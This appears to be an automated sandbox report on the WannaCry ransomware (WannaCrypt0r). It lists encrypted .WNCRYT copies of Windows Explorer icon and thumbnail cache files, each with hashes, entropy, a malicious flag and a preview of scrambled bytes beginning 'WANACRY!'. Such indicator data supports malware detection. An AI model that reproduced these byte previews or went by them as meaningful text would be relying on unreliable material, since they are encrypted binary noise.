                                                  Preview:WANACRY!......3_..E....fb.y/;g.V.*e....%.....o.42<@....#....-.O.`....f..[G.."K.&...X.h...4DGnm..X.xS...X@/.ge.n..E...F"y9o..}.9..4(.M........U.QyNJ:k..f.....|..vq.(..%..M..J.r......1I.R....w.%2.Nr.......q3..1.N{G.......Y.&%..g....p..W_.t.\&.... .<..9...............z.L;........C...&...ZO.t&.5y.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.181349041593196
                                                  Encrypted:false
                                                  SSDEEP:6:bkEMR5oWgvxCsmyrFdFf1lDduMqkH+3HhJlO0pRbuKn:bkEjWSKIfPBu5K+3rlzpRbXn
                                                  MD5:3A3BCB1F7F852A555969A178F1264735
                                                  SHA1:E7CBCB2B6C94B14F1751D321334060E03E4F8071
                                                  SHA-256:43036F0A6090B4F466A0293EFD000E7054E8B831046CA31A8DA76E5563D32ECD
                                                  SHA-512:738B313569E411E0899022449966A8FDEE828EA32C1F0E808F4CF92F0F23AF8DDDD1B82EE70F1912990314950AE1B4720E79978295D05735845BF869C47B1910
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......K.z....+.SR.......H....FpA...D...@.R.y.F?..6...<....Yq...~;....Z.s.*.3).*.|.........i..z.9....].Y. .=A.h.g-...>.i...n.a....Pp..P...K.....$}.....)$<.......X...o.....b.M.@..6.....WQ....S..N....*...A8.&.........G...s9..+.(.H.bMO..RX/.sn...J..u...............<m.k..:3%P.mn....z..2}h.Y..j.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):58600
                                                  Entropy (8bit):7.997282020997851
                                                  Encrypted:true
                                                  SSDEEP:1536:8zgnGV7jUwwIt6M5QK/Iy+EW4LHLjU5Q0kZvlxK4CEA6SrrQ:yLxt6EQK/0sHLjqQ0kZvlxK4xA7c
                                                  MD5:72EBBA885FE8A875985AEB1554293C95
                                                  SHA1:B57F8DD7B07A2A00EA47BF75BB5685CFA503A879
                                                  SHA-256:BFD25F80BD677A1F8933B8A8B5AF0560A098C9B59619EC2A3F0F84950D2711BC
                                                  SHA-512:95E891BFDDA38107956DA4C17EDB6781223F4AC789F28EE0EF9116A8FE3D5A00395058D907778027DF0F70DD3050AA577679406D46B163D40B22C1C2B2941B5A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....E^.$..=......t.]n....=..,..Q..*.P..i.s.`r.......Z.N..f....LBz......x....>3..G....`KbR._F_dx.i.._>m...o..!a...j..i.[.e,.7.-...=./....I0a.....$.+G.wS..Bc.?........jL.G%d.3r..f....../..c.-..HTt...i.S.`.Z._.;.p.G..!.[}.j..........'J.$......`...................)t.'o..n.{....V&.......'....V.....cF....{..cS.Xf.....|..o?g.wZ.XO|..E.;.0Y..W9...;..?....a.......l.......0U....?N..#..KF....}h%.[.}`..|.......0q/....M.....c.ej\j.G.:Y..rd.L.a.9..>...........[.(.#.@.Y?yr....l{.US+*..E.B^t.`...n.,..C..$..K..&....:....r.W..E.@....6*?.t ..c.0..].....iu{....i.)........#..d.mEH....W..f..d+;j(..^YL..w>...n... J.IT.....0E.....RS.`.ek.~<...?...NG..!N....8..X...fveD..3.\L.......#.....I.@.q..,4..[_.5o.Gd.............Z.#NR...4r$gb....I.q..G.C=7...V..o.......5K.._sa.xV.8G..U.?..~..&.D.X.7...._p(^.....H...l$+.(..H........?.y,.=.|......V.a.{2yr`......3#.&9`.V.....L.M/^X...rW0.".&...T.z.K.^.(......w9.a...0@.......<...%...{..c.$...yx...H.....`W....-.....7a..?r.3......-6

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.241251119828446
                                                  Encrypted:false
                                                  SSDEEP:6:bkE2XSGiXwgBr/uLLfMCQB4AOniOAhiGrWwrNky8PVsmd9zrVU:bkE2cwNLvQB4jniOxePN+V5dhRU
                                                  MD5:4CD7FC2A68DE03656D2931EBCFF32048
                                                  SHA1:4AC27562DC35ECF2399A93B6DB42874ED9C70AA8
                                                  SHA-256:8072A7036AC16B171BDFB5E0CD5240C619C5A9CCF31ACC1AEE9538DFCECEE509
                                                  SHA-512:3A00DAD7681652E80FDCACE0C1EEF81D0837B99CBF254DCB4A7027314953DC376C32D9134EB631E43EAF0FAFAFDD986846E5E2C05E573A0E06DAEF7AF7A1B5C1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....!....#.L..3...W..u....f..}j......@..R"....y...}.{.+.F.qN........U.Z}?e.. V..6i.n..G'..:..............%.c.u.....)...<.[8.....Q.1. T.LzH5......un......~....HU.....O...,5....0....Z0,.p:.".......b.d.........[X..6.'.VV...}..}.......'..Jy......_E............^dm...;.=........zc.Y.O&.....

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.308437132793201
                                                  Encrypted:false
                                                  SSDEEP:6:bkEZSjCu1ltIH3hMjSAszEJvUuKmDdghzwtwQveWH7iRMQg:bkEZ6MRMeAziubxgtwtnjbiSB
                                                  MD5:8C4987F8C02C6A7318CD903DDC8B0F7F
                                                  SHA1:E60F758867B2E21F75A3CFAA639D7C41C07A97D5
                                                  SHA-256:E0EDFC20CE24C10D9C35A5C6702A6ECD9FCA63C58260D97A75289C6F6A237862
                                                  SHA-512:8F7F7119A00509E3C9CB547BD195AC3F56321EA2A0FBF7CCFF013645136037C306649D089B178C67F08064E1C94C51119932FE696DA25A9AF8DAD8D38E99C6DD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......|...<P.y|....d.6J[.j4.?eS.?2......W.0..$.......v.?.Y.../1..^......p..eV.......*!t.....K...'.*.L.e......I@.....!.1cA`..<..s:...G..Q......'C*.M&.t.*...\h.3.6.Q....sw.+$5.....k1:7...G...\!O..rT=.E%..q..k.....l.$..i U.xR'<...&d..S.'E..2.m..!x#w............y%.A....}$...fQ..bI.}5a...~.C..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.300775724057425
                                                  Encrypted:false
                                                  SSDEEP:6:bkEwot+mArMWKwwQUm5HSyFaCNnlIlWRp7ClY0qcNjDz78D:bkEGMWKww5m5ycaCk0f7ClY0qcNP8D
                                                  MD5:1995BCC336FE88CFC9DF3691C6A21955
                                                  SHA1:26F18A4F1B0A8FACC932A5ABB82C23B2F3C215BE
                                                  SHA-256:0C82EDA328275539DB884343D00C5097CBCC95466AD3FE7893DE7F7AAAD010A3
                                                  SHA-512:24DF325ED8C99EAC3A6C4DAA8BEA45905EA36C019AE8B0675760F8756F9A2090BF3FA1A42684BB1FFB617681265CDFE33AA965844D8FAC22E986C62F31B87A7B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....S+.....v..I.....Z......~.j.2$...9..8Z..1..h?....+m}.......u-....#... X.N...l.....UM....U.*k.........JX.`=;?.....B.X..g.Q,..+C#...H)./...><...y|........].........W4.}>Zg\.... T.k.p.o.P;...+.j.<q.f.x.:._V.B$9.T.6vegm....'.;..i%.e.h.S..^.F....f............~.$|.QL....-u.......K!..Z.<^31Bf

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.137375748292466
                                                  Encrypted:false
                                                  SSDEEP:6:bkEHzSalXoQfKsk275Z5hv1nTLCnNAX4TY6ubLLsUMErWMPibat:bkETznkGJnTYZTq/FMEi/bat
                                                  MD5:E8CB1C79AB234B3A5D8EE857E173432E
                                                  SHA1:0B1A1E8E67B240A8F6410751E9CB92694F808CA3
                                                  SHA-256:86E4C7983FAAE08A40649D3589CA08B684316F2B844EED2A7B350E2AF0631D30
                                                  SHA-512:EF1DB80B5EC56BCDC3B146D94EAB0408822A46E62109618C09858D417E60BCC9AD7FF85A9C6E99A349D84678DFCE9BD3B87B117716087FED99186B7138F5505A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....Tq....=.<....3..t..0..U......&c.R.G..6@...[Y..5j..@....._eMp#+.~.v5+...T..Fp|:9...).......T...YO!.z...Bt....40.r..'.J.M..;K. ....../zM.=Z...N..........4..M....3......0?.v.....].61[..4..5..F..nnI.4.l.2....j2.|..!...U...uh.S.S...j.~j.n...................X.i.....J.....L.../..[..@=...

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.99981494717792
                                                  Encrypted:true
                                                  SSDEEP:24576:NFQPbqIh2rZErNUy3u6jxFjwsh1sUILDvwcW:DQTqIh6GjxFjfhuUILDvjW
                                                  MD5:63E2B2BCE86A8D40C10BFDEF71080AB6
                                                  SHA1:9249FF2857FA7BE425458D1D0245BE92B991B23F
                                                  SHA-256:8C3EFBCCE7E7247FD5BE9AC1AAE634C4C0CEFFA09DFD2932248ADBD5D96EFE00
                                                  SHA-512:970581ECF765E769B09F7832EBD395A7BC0CB767FADA8A6FD0305564981D87A2ED684653E5C9971EA7D972E64F1BC48AA2DA5E920CA77B170A8E67FF1CE4223C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......n2ok.... ......`....F .rg.n...(.......5JR.+_...+.rP|.`f[.`.'e..E.f(.X..z.../5C.......u.]..G..D..j.Lm.*.4...4S...z.Q6'.*D"..w...5...q..z.0.w..".9l.WD..$..Y....H.W)@..]%`....g..`....2.g==M2..Oo.j.+TG...$.H.+......P-Q...o..c..E.....B./.9ja..(............]F=9..0.uD....(~.N.[.KM.....%..5EA...G.D..+..@SH...w....0.U.l..O.s..Z.........*wl.S..Y.TT.g^....P#...HTYf.O...^...s..SZ.W}P..*..".A.*hD(w..G.7<.}..G.i:...w9b2.>..o..o3....Q.U...o.A.....53.>......\....._.\....Me....l.j.e..p...R..PJ/.ZEz.I.....:.@....2N..Cr...B.....^.q.y.7...:2....8dTL....Q.]NY..z.j....=TC...}V...lv]q.`.A..8...=.Z{...G...iR....k..qZ.K?.[\.,f........T. 3....;.....~u...?.z..."...c..f.x#2...<n..5H.;.......=.V=.P2.....Y.r..XMm....b."v..<....@....u..w.w..._...Y.\u<|..K.$.6..+...l.d.X.8..Mc..W.Z.s.?)....Z(mku.I...k....g..a..Y..U]5...GG|..a.,.U.4mx.v...d.....iO................51.D|.8.........4O..).......s.._ju....J..E>..Rm...i.yU.L.~x....]19*bB.......".....%(..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.180468195209316
                                                  Encrypted:false
                                                  SSDEEP:6:bkEAtEiYY1tk+IeGZM7avqjmRN0ZMqDttgPbj00dYCPG+TfbOfm/JLsJ:bkEFk1t/IQTjmLcptgPbjhdYCPG+Tf61
                                                  MD5:9393609104B83DC99284259E12052EF3
                                                  SHA1:69EC210FBE1452BA635FF06E3F222E1C3028669F
                                                  SHA-256:C46A22F9D85C060301F5663B796EB0A81C6EBB9D8C8A2A677A2BB2247B51FB31
                                                  SHA-512:88487B4F85AF819EE9A80B61591015BF7B1656F044B4F5EC608FB214D261793F6A8F5E11720AFE4DD3DFD1364E543C43EBF09A6BC661ADC991D7C6A5F1868721
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....@.~{..j|.d..~.;. .M......+y.v=x...].3...XF.\...pF...4.Ze..)....p`K{...Q.C..H..?cG+YJ.....'.Mn?.3^..=..O.m..."..B..=I:(o...8.....`....?.w.)W...Zu..mJ.n.G-.h....E.Jr.G.........-.Bh.,.r.\6G...xD..; ...WB.@y..dK1K!.....~@=Z.t...^....b2.]m^5#*".q^.............M'....q.._....2.nvmEG..Iv..V..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.999828019306985
                                                  Encrypted:true
                                                  SSDEEP:24576:/HSZRG40Hu8dm8cMYnV+BuSX1mVA8BBP11nc2sRkLX6G7:aZgf5d2MYQBuSEVxT1ncVRhu
                                                  MD5:D66675F788CCA636A26038056EF9A25B
                                                  SHA1:1C82DF37AF22226F044633E9BA5C74239CE8BDF9
                                                  SHA-256:6789FFDEE7DF6417575E674ABC6077F5696616581123EB256A394AD5B28141F7
                                                  SHA-512:5E721F68CAC67DAB21A32DC31B6B997303F711490DFD06CF817A70ADF028B32D49790971C4607712CA661D145F469C962C90259CC2F7D4F20E45552D595B41BC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....Ua5.g...H.LN.7..C....u..^w..8...c...PA...?..k;...Z...f./.\...xZ<..~Hb./..".._............S..eX.^....j&>._..v.F...s..j>J.6.f..Q d...H..W.L..]..l~Z*C..{.v<.\8Vv'/..F-.@....... .=..8.:..2....y/.Q.$.H;...(......5g..1....#..R|QT..^.L...{..C..h.~...............!0...#T......t..[UB]H.^=t............A..&.xF..\.....\r".:6Y.i...bI....c.R.b.Hz..W. a|X..8....sT..X.....^..%.[..^Ie=...@..+..I..4...Y}..^;.0.....$v..^._...(..D.+T..+..*.;.\....Y.....:........p.y.A.C.e....<S.....-..:..%?Xb..2y..1..8...........d.1.L;..[..6..X..I...#...uc..$..@..ql....D.bLO._..L.8.q......#U..$m..*\....}F..c.[..,&...K/*6D1..R.hL....gk..aw....Y.(.....^g....D.+.f..u......|,...x....S?..Q...1........d...2..u.|..3...A.....&......!..Z.o....X.4...Q...rAIO.4?...t..".*V.....|.P...o?..`;.E.X2..3S.6TC......If.....|f....D..6^B..0>..OI...;[x..gs..d.wQ......T..........|....32.J&u.[.h.I....Y;.$.O......c..:.F.c@.....!..O.f..\.FI .c)P\..\....].=.Fn.X.+.q..5....H..X..VR.w.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.265498083071431
                                                  Encrypted:false
                                                  SSDEEP:6:bkEZqnQrXNloOE8N9iDZ7gaUYvbC4JtL5dBE+YTVI7iA+7mTebZ8xW28mYA:bkEeYNdFiDZ0i7JJ5dBEHZGi3a4K
                                                  MD5:403A9A118C60A73FC3E8453BC1C98942
                                                  SHA1:A990EC0BB42958F361A91EF80038F0D113162BAA
                                                  SHA-256:3437E59C2F2569503026F8D3818831D0C150A9A71030E5AE469B2896C5E5289A
                                                  SHA-512:1517F1D9BBB2B8D9597235C6FBC006FB81F2AA4F5BA5E5C4D82D5A152EEF38EC6FA8164B1CDE9BF45ABEBB49F7022DB9233A407567175991FCE87F38C3FF6554
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....L^.B."..}..~............Zz..0....]...C...}....:qYt%M+.t....b.....eUr.........c..%_.........Ao.Ze.m.j.....!s>.a}.....lWy.Y..F.G_.M..,'.ai.......G.]/ ..!+X.*..+./;..6..C....M.G.Piv..lk.";.....CA...w4E ..M~..._.... ......t..........xP.q..........8..............L}b..6Y.....f.....KMNYC...:.I

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.999823465789391
                                                  Encrypted:true
                                                  SSDEEP:24576:WTeDDVC4IBp2ml7UeEoSFsZsbtrgi06F5fm7Hr/3SLG9yxg2umDmL:qedHIBFLEGsdoa5sr/oY
                                                  MD5:1106201263474C4E5DA64AC8EE23221D
                                                  SHA1:CA85124E2BDC74C1FBF3FB674BA5CD2163273073
                                                  SHA-256:040A8DA9008B6A6F641BA5577D1E0F3C2DEBA9574B72D420DEFF870F9F4A171C
                                                  SHA-512:C7D1B2C45A411B51B2E3D417E711EFDB70F4EAD2D057512ADAA2F41769FF4BC72A99CE3492DE8EE004F374E78117CAC2C243F17D05F8ACFA19C8951D1B7039D1
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......O.R.....YG(G....$...5b..&.`%m.b.!t....y..o.B..x...<\...G.K`P.o.........j~..p.. t.....[.C.a...&._..(sGM..M./..)..2d-.t.....F}R^Z....u.P8...rE.X.u.....`.......q...2...\k....m.....xPn7.V..d.^...P..?..m.Hkf8[.#.c.gd..jj...o...)....-K.M;.................d....u....r..[.d|)..Y...n.a'P..d,..vCb*x.......e.k.`..:Z......b.}/..l.$...................p..!..cs.w.a.....f...\......H<`O)..[.....d....v...}.JV.........~...e.;....T....`..a7..1.;e>~.....1 rJ....".G..q.,3.to0}z..../..(..l.'..|M..~.^v.......)f.6...St.ei.p&.</(...BA.&..Q..=.y....'JVnJ...Q'.....w.....up....`.......N....j..vTd..j..Hi($..!M|..9.Y.Ul...2.*...F.o.......3{..A...P*..b.....P.o.....Hr...f7....%.%.i.....Xh..{7...H.\....ga..U...;......B!...{..,....].....GDb.....lS.}T.s.Rp.].o..4.R.'E{...!M.Z...Z..............P.}..A.c<x......P.2{M..-i.9.Q))..R...Z.4..:...E..."##.-....h$.....7.a{u..9..r..0....j3..p. ............9w.'....R.(/...!....../.kB.).l;,...MlO...b.?.......nU....R...

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.99979235793336
                                                  Encrypted:true
                                                  SSDEEP:24576:hP3qa+4qrF8TaBQLJRibLnS/i6OH0bT3GMDCOBf:t3vCF8TaBQLm0J1Bf
                                                  MD5:BC42C140EBB6D3734A664F2E60BAB1CF
                                                  SHA1:F37B7CC2DF2FEAF8F914334D1A8F6255450AE6B6
                                                  SHA-256:65032F8B6B24B940775B30F1664ACBBAD012BF1CB44175810792DA3EDEBEEC0F
                                                  SHA-512:01183A46DCDAF1E2EC45801B2E494428F58455E7A7504518F8454B2762224CA8017BE46749BB63A800E7CDF6022D92556756F19336508C5D56F425E4D1D1A79E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....h..p...,!..t....E2.Q.D^.,.;6...;.[..Q....r.......yHv]..b..;..H..G....7...|.....7..K.;f..Fn.2&..q..R......~i..}..P.i..5...nh.sJ.0.h.G.>..`.D0.$."64,.$.I.<au....&.M.5j..5.,m]a\..../...!..........`$..N&.BJ,p...sI..i@./...W.!.2I.N..iG.0...T...............z2.W.4K$....g\.*.*.d.4..............!!..YF...*.aq...r..{"C7j..!.s.#....z........P.W...P}.mkxSf1.V...p.s\..sX..E.%.c.;.F..F.c..LWZ..T.`&.I....|ux.M..H.a....#l..,v)gF....d.....y...w..#..qZ.tja..<k....(_....Z....1......x.6]....A..6..m.N....#.O,....b.Qw7....r.!z...L.2.V.5.....^\......bw!....`..L.$.?c....R../.....JH...i..a...o...+.x../...'_.J._^..0...J.^.xJ_...O3...]...K.7..=.N..b.i..;..\..B.k).0k..j...$.2.q..:]\..g.H..5..g.s#....%..)Y.0.......PwE.9..71.....8..>xK%Z..S3nAE....^..W.;....u.I-...v.......[...._pN.....XI7..w...j..T......G.....1.(.C.!.=.j.e.S.....".lv.vd....v.{....%..D.i9.a..T.. ...3<...q$......t9..i....y.....n.x..+C.].t.lIiC...`..?.2..Tw....5.g.3....X...]#-....SF."..K

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.242099397092838
                                                  Encrypted:false
                                                  SSDEEP:6:bkEdp8nQ/bjwFpI3BO3CPPZLRmFInCXYZ3L8oOiLumJyCK7hSWvU5hPcuXrM7e:bkEd+Q3asRmFV03QofECKI2U5pNXY7e
                                                  MD5:3B5BF3A3C1843FF7A878E55270F1636C
                                                  SHA1:D5258DA6053945D0475C82EDC325AB7D9B7DCD73
                                                  SHA-256:0090EDE53370093070E3EF46DCD4FDC8F97171229DDA5D35EB4C4DD640BCE3CC
                                                  SHA-512:23EADAF24F82D08AA8710D7C8982026B3EAE760933B838F16FBA2E3A9A90A12E250EF6837E6174F546AEB78428734350017FE464A9C264DAE9C4B1638F997F1A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......4p.O.N.r.x&.g...wjI".0m.2.I*.e.....=Fy..~l.K|.X.N#c.C..5.9wbugk..Et.$.]....w.j.~.a.......W,.....N........k..r...`.N.n..J...Ip.....ad6..&.<M./xL.l.eL.....m:.e....M...$c..T.l.~...G:..D......J..*b.#..F.Zv'@......&|].P..7.._..kP!.b....%].....o..............a"6.k...l...5K.B2...........ok

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4194584
                                                  Entropy (8bit):7.999955357989935
                                                  Encrypted:true
                                                  SSDEEP:98304:nGn28O5Y3Kfqya4v9gat9HoFdqxICuPLMtKg+fL0aro:i28O5YKfqtuSatuFaICu5giL0aro
                                                  MD5:752B2615BD0C73DE2F7F3568F8A32097
                                                  SHA1:0EA6356F703FA8774CCCE38E22403557BE01B6A3
                                                  SHA-256:F2443118B05C026C69B8BB5F7F4D32621205A37161DDC5288B28BEFA6500811A
                                                  SHA-512:76B662F4C677FB8655EFA95CD2133B41D5708E481DBC7750F7DA770C9B461BE3104CF40719BD89399A7ED3CA610C7271E4D1A3A45099F5751F8F56284E59A1AC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...../...S..4.ax&.B.....[.v.n*..^H._[....)Z3)....p....0.....C..0X......h...J..H.....sr....kYSl.9...@./.\..G.........d5,.y.....,.Z.8.s.@..#....y.y6......Y#.u'...%lEbO.[../HBh.[.G.zK.j.X....g......."^}.m..........j..Q..<..*...Gq..Z.[...;[.~.W)..0........@.....\.=...<.u.:A..R.c .';.....v.g...j\H7..lU.'$...0.N...m..P.....'.l...Q.....V.....-..?.=>zK].+....r.{...[."&.~.^..h......J.s.IR.&.......1a...2....rk.v..,...y_....z.Y.Hd1.g.....D.1.x..(?.~....?{..\......9.L.;:....A..d.kF.}.....i......t....S.c;>.r.Oh.../.h.\.P....\I......1...O|.B....a.)D.)1..X4+...Mg...:.f..p'...&...(..rZ....u..Z].. 3..S........g...a&.......Y..z-..}...B....G.(v...Y.YTI..vf..\....M.F.`Q"&V......`.wZ.j7.d..{..+......KFKgZ.ib..Lz...f.O.+.m.a...O9$.G..nu.L.$..@G...#.k.-..;.q.My.,.6^B5}v.<..\g.?H....,'..:..A.....f.B...26..8.....lv...p.z.h..~.|gP?.L..@.F.....z..Px.H.6A...E4.$.2|^.k.....X..}..76..B!..\....L.V..F.n2..[..d.<..o.e.^.\.{.dD.ju..jP.}!....f.\...*Y<v/.oT!=@i-I|...^..L>'.@

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_custom_stream.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.213510664597503
                                                  Encrypted:false
                                                  SSDEEP:6:bkEv3+VcnkD22Gu69fg0xoAtFphDf5T7iR4KSZb1XPiJnB3IEn:bkEv34m2e9fo+FphB7iy5GJnz
                                                  MD5:A39CB6C3FDDBC1ECC0604A113C53AA1D
                                                  SHA1:5D0CB1B5173E30E3B9108800F2F76DE5722AAA9A
                                                  SHA-256:EF07A7384338536F76492656AC0FBB4425C14E680B2B45ACC099904619F8A329
                                                  SHA-512:FA059699F7692C4A643D55D5F44B90560C5E5F343DB155C17B1911E146213794A1AA98F93FD6328B5F0143CFD1495F31972B713376C852F4B79E0120ECFA4690
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....V,bq..\.[...w-.3...$P...6....y.|.+.3..:Q...D.&...Y..4M5...J...G...*tE...`..B...l.....1.K.{.\........z.u....$c5..5.%=..RJK~w.5`.$...@2..qq*....J9...`X[..2..E.r.$.....@.[....^A&L.W.w.n..K..|8:.U..G.gR&a.~..S....e%}]...a....3.F%5].Vk.3.1..,j.."..............W..".V..s..A .c.s..Vp...l..%..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_exif.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.165993655002149
                                                  Encrypted:false
                                                  SSDEEP:6:bkEL7ymGVjtOT3jmT52QhFKK7kGL8G8DLhC/+OQ3:bkE/ymutOu9zMK758G8DLhy+OQ3
                                                  MD5:A666D686D53FDC5C858630A7463A8DFF
                                                  SHA1:24CC6096C6BEDAEB9088AF7BC82EE371B9AF06BF
                                                  SHA-256:AC9630978021B55B07D6BF307E325EE98C0F8FF32A9FE9FCDE84ADC0BA7D37C0
                                                  SHA-512:1839FD0B2E411F029DF118917CF794F50DC8AEFBEF653D8AD262214D896090AAD80EEDAD64FAAEDD004B57152AD782DEC4C15AFDC7F390161423DEB60F9CFD1C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....;V......GK.q.OX.i.R.c..zF.q.c.&y..Z_.......,...:@S.Tr.cQ..0................qWc....emo...X.........@....H..Tw*....\..4}S...(.}...I.N..{....V..........D(..81..r.T...U........d...5.!qw...E^qVA......].<q.8..........|....g!jZ.....<g...-l.g....d.............../.Grg.j..8rb....3....Z.......i.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):29512
                                                  Entropy (8bit):7.993634030579915
                                                  Encrypted:true
                                                  SSDEEP:768:a2V7MzzgHARPX4wDy38ctI6LE2Wl63fNil7c/3BWtUsU:tHA9IwOMWI5VyfQ7cBsU
                                                  MD5:5C4987FF274CB8983B8A9D87D26581CF
                                                  SHA1:9D4E661F49AAE84F441D3248D0ACDD7DE37456F2
                                                  SHA-256:2D8396A6802CB7DC4AE921596EDFF691AE1C6CBE8664D5536003EB83D40E6031
                                                  SHA-512:92EC90770D8A058828A5B77B4F5974DEF56912CA5AEFF2A48C94AD6427E31B4A2C8EC7D1061F716930CA20851B8813EEE48F7E082CE4C4CF8A7A907A602ED585
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....D.R....\.q?......j.H...:.].Y.64...c...".El.e.@6..z^v~...P.0.Ikc....%..8.R..B....!..s]0w.....'...|a(.=....U..<./Y.2...&.H...1iw.)..$)'k. ..W..=.C.zh...^....:...Rv.t..u..p.j1.e.r..t\.3.w!$.....r}.3.y> .YH.kb.......S.}&.y....<.....F.d=.f......?.J....0r......V....\...B.d......(.."..X...}..-v.....g.M..c..R.AQ$.`.m...1b...W.c..f.H........tc>+......T..c+F .....2`.=.!.7...i....A...;...Jw..x(.Ty2J....{O.A.3q.('.[..[........b]fOP."x..r...Kz"..(.=.....-B...N.}<..k;....dkq#DrA'..{..s....+.@+...i.4q))@fJ...A....>.<..*.)[..{....>.[......;..2.'..d..]..aR.YX....R...O...6..`jJ.....d*.Jh..9....r..A.B.B..........nb.7;m...,.aJ@b...|...h..N!M..I/P@.{.bR.3UF.N..*...E!9c.....@.......N.7ME..fy..<Qq<.f...X].w= U.3..z.[Q,7.6...K<.T....c...'9.64....6.....C...mD<9..B.X....b!.A..g.d..1......ss9oN........=.?...P.f..9.Y.>Y...U.-....e.oE..K.....t#..q...(.>.D........|..Jt..\.=]...~-[..F.++..aT. ...Z.m..2...p5..k.H]/.GK!D..n.1.2..-.T^..bfr@..GS...'[....l$.......=....

